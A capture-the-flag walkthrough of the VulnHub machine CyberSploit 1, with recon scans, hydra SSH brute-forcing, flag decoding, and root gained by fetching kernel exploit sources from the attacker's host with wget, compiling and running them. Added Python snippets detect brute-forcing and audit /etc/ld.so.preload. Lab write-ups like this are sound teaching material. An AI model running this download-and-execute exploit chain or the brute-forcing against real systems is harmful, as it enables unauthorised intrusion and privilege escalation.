CyberSploit
Target machine information
Name: cybersploit 1
Identifying the target host IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:72:62:36 1 60 PCS Systemtechnik GmbH
192.168.56.176 08:00:27:df:60:2f 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.176.
NMAP scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.176 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-16 20:52 EST
Nmap scan report for localhost (192.168.56.176)
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
| 2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_ 256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Hello Pentester!
|_http-server-header: Apache/2.2.22 (Ubuntu)
MAC Address: 08:00:27:DF:60:2F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.14 seconds
The NMAP scan shows the target host has two open ports: 22 (SSH) and 80 (HTTP).
Getting a shell
Opening port 80 in a browser, the page source that comes back contains a comment:
</pre>
<!-------------username:itsskv--------------------->
</body>
</html>
Is this the SSH username? Could it be cracked with hydra? Set that aside for now; does a directory scan turn up more information?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ curl http://192.168.56.176/robots.txt
R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ echo 'R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9' | base64 -d
Good Work !
Flag1: cybersploit{youtube.com/c/cybersploit}
That gives the first flag.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ nikto -h http://192.168.56.176
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.176
+ Target Hostname: 192.168.56.176
+ Target Port: 80
+ Start Time: 2023-01-16 20:56:42 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 153327, size: 2333, mtime: Sat Jun 27 00:46:41 2020
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-01-16 20:57:17 (GMT-5) (35 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ gobuster dir -u http://192.168.56.176 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.176
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/16 20:57:55 Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 2333]
/robots (Status: 200) [Size: 79]
/hacker (Status: 200) [Size: 3757743]
/server-status (Status: 403) [Size: 295]
Progress: 220320 / 220561 (99.89%)
===============================================================
2023/01/16 20:59:35 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ gobuster dir -u http://192.168.56.176 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.176
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: txt,sh,php,html
[+] Timeout: 10s
===============================================================
2023/01/16 21:00:35 Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 2333]
/index.html (Status: 200) [Size: 2333]
/.html (Status: 403) [Size: 287]
/robots.txt (Status: 200) [Size: 79]
/robots (Status: 200) [Size: 79]
/hacker (Status: 200) [Size: 3757743]
/.html (Status: 403) [Size: 287]
/server-status (Status: 403) [Size: 295]
Progress: 1101828 / 1102805 (99.91%)
===============================================================
2023/01/16 21:09:45 Finished
====================================================
The hacker path contains a single image (GIF format). Before trying other wordlists or tools for directory scanning, can the SSH password be cracked first?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ hydra -l itsskv -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.176
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 21:11:40
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.176:22/
[STATUS] 78.00 tries/min, 78 tries in 00:01h, 14344327 to do in 3065:02h, 10 active
[STATUS] 72.00 tries/min, 216 tries in 00:03h, 14344189 to do in 3320:25h, 10 active
[STATUS] 66.57 tries/min, 466 tries in 00:07h, 14343939 to do in 3591:07h, 10 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
Nothing was cracked.
Oops, the flag1 obtained earlier is actually the SSH password. It really does not look like a password, no wonder it could not be cracked.
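From the defender's side, the hydra run above leaves a dense trail of `Failed password` lines in the target's auth.log, and the eventual successful login from the same source is the higher-severity signal. The detector below is an added Python example, not part of the original post; the auth.log lines are constructed to resemble what OpenSSH logs for such a run, and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt (not from the original post) in OpenSSH's syslog
# format; it models the start of the hydra run above plus the later login.
SAMPLE_AUTH_LOG = """\
Jan 16 21:11:40 cybersploit-CTF sshd[2101]: Failed password for itsskv from 192.168.56.146 port 40412 ssh2
Jan 16 21:11:41 cybersploit-CTF sshd[2103]: Failed password for itsskv from 192.168.56.146 port 40414 ssh2
Jan 16 21:11:41 cybersploit-CTF sshd[2105]: Failed password for itsskv from 192.168.56.146 port 40416 ssh2
Jan 16 21:11:42 cybersploit-CTF sshd[2107]: Failed password for itsskv from 192.168.56.146 port 40418 ssh2
Jan 16 21:11:43 cybersploit-CTF sshd[2109]: Failed password for itsskv from 192.168.56.146 port 40420 ssh2
Jan 16 21:12:05 cybersploit-CTF sshd[2140]: Failed password for root from 192.168.56.1 port 50001 ssh2
Jan 16 21:30:12 cybersploit-CTF sshd[2200]: Accepted password for itsskv from 192.168.56.146 port 40990 ssh2
"""

AUTH_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

def parse_sshd_events(text, year=2023):
    """Return [(timestamp, result, user, ip)]; syslog omits the year, so it is assumed."""
    events = []
    for line in text.splitlines():
        m = AUTH_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Flag (ip, user) pairs with >= threshold failures inside a sliding window and
    note whether the same pair later logged in (password found). Values are assumptions."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, result, user, ip in events:
        (failures if result == "Failed" else successes)[(ip, user)].append(ts)
    alerts = {}
    for key, stamps in failures.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while (ts - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                later = any(s > stamps[-1] for s in successes.get(key, []))
                alerts[key] = {"failures": end - start + 1, "later_success": later}
                break
    return alerts
```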
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ ssh itsskv@192.168.56.176
The authenticity of host '192.168.56.176 (192.168.56.176)' can't be established.
ECDSA key fingerprint is SHA256:19IzxsJJ/ZH00ix+vmS6+HQqDcXtk9k30aT3K643kSs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.176' (ECDSA) to the list of known hosts.
itsskv@192.168.56.176's password:
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
* Documentation: https://help.ubuntu.com/
332 packages can be updated.
273 updates are security updates.
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Your Hardware Enablement Stack (HWE) is supported until April 2017.
Last login: Sat Jun 27 10:14:39 2020 from cybersploit.local
itsskv@cybersploit-CTF:~$ id
uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)
itsskv@cybersploit-CTF:~$ ls -alh
total 156K
drwxr-xr-x 20 itsskv itsskv 4.0K Jun 27 2020 .
drwxr-xr-x 4 root root 4.0K Jun 25 2020 ..
-rw------- 1 itsskv itsskv 233 Jun 27 2020 .bash_history
-rw-r--r-- 1 itsskv itsskv 220 Jun 25 2020 .bash_logout
-rw-r--r-- 1 itsskv itsskv 3.5K Jun 25 2020 .bashrc
drwx------ 14 itsskv itsskv 4.0K Jun 25 2020 .cache
drwx------ 9 itsskv itsskv 4.0K Jun 25 2020 .config
drwx------ 3 itsskv itsskv 4.0K Jun 25 2020 .dbus
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Desktop
-rw-r--r-- 1 itsskv itsskv 25 Jun 26 2020 .dmrc
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Documents
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Downloads
-rw-r--r-- 1 itsskv itsskv 8.3K Jun 25 2020 examples.desktop
-rw-rw-r-- 1 itsskv itsskv 495 Jun 27 2020 flag2.txt
drwx------ 3 itsskv itsskv 4.0K Jun 26 2020 .gconf
drwx------ 4 itsskv itsskv 4.0K Jun 25 2020 .gnome2
-rw-rw-r-- 1 itsskv itsskv 142 Jun 26 2020 .gtk-bookmarks
drwx------ 2 itsskv itsskv 4.0K Jun 25 2020 .gvfs
-rw------- 1 itsskv itsskv 1.1K Jun 26 2020 .ICEauthority
drwxr-xr-x 3 itsskv itsskv 4.0K Jun 25 2020 .local
drwx------ 3 itsskv itsskv 4.0K Jun 25 2020 .mission-control
drwx------ 4 itsskv itsskv 4.0K Jun 25 2020 .mozilla
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Music
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Pictures
-rw-r--r-- 1 itsskv itsskv 675 Jun 25 2020 .profile
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Public
drwx------ 2 itsskv itsskv 4.0K Jun 26 2020 .pulse
-rw------- 1 itsskv itsskv 256 Jun 25 2020 .pulse-cookie
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Templates
drwxr-xr-x 2 itsskv itsskv 4.0K Jun 25 2020 Videos
-rw------- 1 itsskv itsskv 0 Jun 26 2020 .Xauthority
-rw------- 1 itsskv itsskv 12K Jun 26 2020 .xsession-errors
-rw------- 1 itsskv itsskv 14K Jun 26 2020 .xsession-errors.old
itsskv@cybersploit-CTF:~$ cat flag2.txt
01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101
itsskv@cybersploit-CTF:~$
Decode it with CyberChef (From Binary):
good work !
flag2: cybersploit{https:t.me/cybersploit1}
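Both flags so far are simple encodings (base64 in robots.txt, space-separated binary octets in flag2.txt) that can be decoded offline without CyberChef. This is an added Python example, not code from the original post; the encoded strings are copied from the output shown above, and the heuristic that decides which encoding is in use is my own.

```python
import base64
import re

# Encoded strings copied from the target's robots.txt and flag2.txt above.
ROBOTS_TXT = "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9"
FLAG2_TXT = (
    "01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 "
    "01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 "
    "00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 "
    "01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 "
    "01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 "
    "01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 "
    "01110000 01101100 01101111 01101001 01110100 00110001 01111101"
)

BINARY_RE = re.compile(r"^[01]{8}(?:\s+[01]{8})*$")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
FLAG_RE = re.compile(r"cybersploit\{[^}]*\}")

def decode_binary_octets(text):
    """Turn '01100111 01101111 ...' into bytes; rejects partial octets."""
    bits = "".join(text.split())
    if not bits or len(bits) % 8 or set(bits) - {"0", "1"}:
        raise ValueError("input is not a sequence of 8-bit groups")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))

def decode_flag(text):
    """Heuristic (my assumption): try whole-octet binary first, then strict base64."""
    stripped = text.strip()
    if BINARY_RE.match(stripped):
        raw = decode_binary_octets(stripped)
    elif BASE64_RE.match(stripped) and len(stripped) % 4 == 0:
        raw = base64.b64decode(stripped, validate=True)
    else:
        raise ValueError("unrecognised encoding")
    return raw.decode("utf-8")

def extract_flags(decoded):
    """Pull every cybersploit{...} token out of the decoded text."""
    return FLAG_RE.findall(decoded)
```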
Privilege escalation
Upload the linpeas script to the target's /tmp directory, make it executable, and run it:
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[2] overlayfs
CVE-2015-8660
Source: http://www.exploit-db.com/exploits/39230
[3] pp_key
CVE-2016-0728
Source: http://www.exploit-db.com/exploits/39277
[4] timeoutpwn
CVE-2014-0038
Source: http://www.exploit-db.com/exploits/31346
itsskv@cybersploit-CTF:/tmp$ chmod +x linpeas.sh
itsskv@cybersploit-CTF:/tmp$ wget http://192.168.56.146:8000/39230.c
--2023-01-17 08:55:20-- http://192.168.56.146:8000/39230.c
Connecting to 192.168.56.146:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8487 (8.3K) [text/x-csrc]
Saving to: `39230.c'
100%[====================================================================================>] 8,487 --.-K/s in 0s
2023-01-17 08:55:20 (40.2 MB/s) - `39230.c' saved [8487/8487]
itsskv@cybersploit-CTF:/tmp$ gcc -o exploit 39230.c
itsskv@cybersploit-CTF:/tmp$ chmod +x ./exploit
itsskv@cybersploit-CTF:/tmp$ ./exploit
Failed to open setgroups
itsskv@cybersploit-CTF:/tmp$ euid: 65534, egid: 65534
id
uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)
itsskv@cybersploit-CTF:/tmp$ ./exploit
Failed to open setgroups
itsskv@cybersploit-CTF:/tmp$ euid: 65534, egid: 65534
id
uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)
itsskv@cybersploit-CTF:/tmp$
Execution failed.
itsskv@cybersploit-CTF:/tmp$ wget http://192.168.56.146:8000/37292.c
--2023-01-17 09:00:00-- http://192.168.56.146:8000/37292.c
Connecting to 192.168.56.146:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: `37292.c'
100%[====================================================================================>] 4,968 --.-K/s in 0s
2023-01-17 09:00:00 (684 MB/s) - `37292.c' saved [4968/4968]
itsskv@cybersploit-CTF:/tmp$ gcc -o exploit2 37292.c
itsskv@cybersploit-CTF:/tmp$ chmod +x exploit2
itsskv@cybersploit-CTF:/tmp$ ./exploit2
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# cd /root
# ls -alh
total 40K
drwx------ 5 root root 4.0K Jun 27 2020 .
drwxr-xr-x 23 root root 4.0K Jun 25 2020 ..
-rw------- 1 root root 705 Jun 27 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 19 2012 .bashrc
drwx------ 3 root root 4.0K Jun 27 2020 .cache
drwx------ 3 root root 4.0K Jun 27 2020 .dbus
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
drwx------ 2 root root 4.0K Jan 17 07:20 .pulse
-rw------- 1 root root 256 Jun 25 2020 .pulse-cookie
-rw-r--r-- 1 root root 1.2K Jun 27 2020 finalflag.txt
# cat finalflag.txt
______ ____ ____ .______ _______ .______ _______..______ __ ______ __ .___________.
/ |\ \ / / | _ \ | ____|| _ \ / || _ \ | | / __ \ | | | |
| ,----' \ \/ / | |_) | | |__ | |_) | | (----`| |_) | | | | | | | | | `---| |----`
| | \_ _/ | _ < | __| | / \ \ | ___/ | | | | | | | | | |
| `----. | | | |_) | | |____ | |\ \----.----) | | | | `----.| `--' | | | | |
\______| |__| |______/ |_______|| _| `._____|_______/ | _| |_______| \______/ |__| |__|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( c | o | n | g | r | a | t | u | l | a | t | i | o | n | s )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
flag3: cybersploit{Z3X21CW42C4 many many congratulations !}
if you like it share with me https://twitter.com/cybersploit1.
Thanks !
#
Using a different exploit script, privilege escalation succeeds.
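The working exploit announces `/etc/ld.so.preload created`, which is exactly what a defender should look for afterwards: on a healthy host that file is normally absent, and any entry pointing into a world-writable directory such as /tmp is a strong post-exploitation indicator. The audit below is an added Python example, not part of the original post; the sample file content, the trusted-directory list and the helper names are assumptions.

```python
import os
import stat

# Directories a legitimate preload entry is expected to live in (assumption).
TRUSTED_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64")

# Constructed sample content (not from the original post) of the kind the
# exploit output above implies: one injected library under /tmp.
SAMPLE_PRELOAD = "# constructed example\n/tmp/preload-sample.so\n/lib/x86_64-linux-gnu/libfoo.so\n"

def parse_ld_preload(content):
    """ld.so.preload is a whitespace-separated list of paths; '#' starts a comment."""
    entries = []
    for line in content.splitlines():
        entries.extend(line.split("#", 1)[0].split())
    return entries

def _dir_is_world_writable(path):
    """True if the directory holding `path` has the other-write bit set."""
    try:
        return bool(os.stat(os.path.dirname(path) or "/").st_mode & stat.S_IWOTH)
    except OSError:
        return False

def audit_ld_preload(content, exists=os.path.exists, dir_world_writable=_dir_is_world_writable):
    """Return (entry, reason) findings. The filesystem probes are injectable so the
    logic can be exercised on constructed content without touching the host."""
    findings = []
    for entry in parse_ld_preload(content):
        if not entry.startswith("/"):
            findings.append((entry, "relative path"))
            continue
        if not any(entry.startswith(d + "/") for d in TRUSTED_DIRS):
            findings.append((entry, "outside trusted library directories"))
        if not exists(entry):
            findings.append((entry, "file does not exist"))
        elif dir_world_writable(entry):
            findings.append((entry, "parent directory is world-writable"))
    return findings

def audit_host(path="/etc/ld.so.preload"):
    """Audit the live file; an absent file is the normal, clean state."""
    if not os.path.exists(path):
        return []
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_ld_preload(fh.read())
```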
From: https://www.cnblogs.com/jason-huawen/p/17057471.html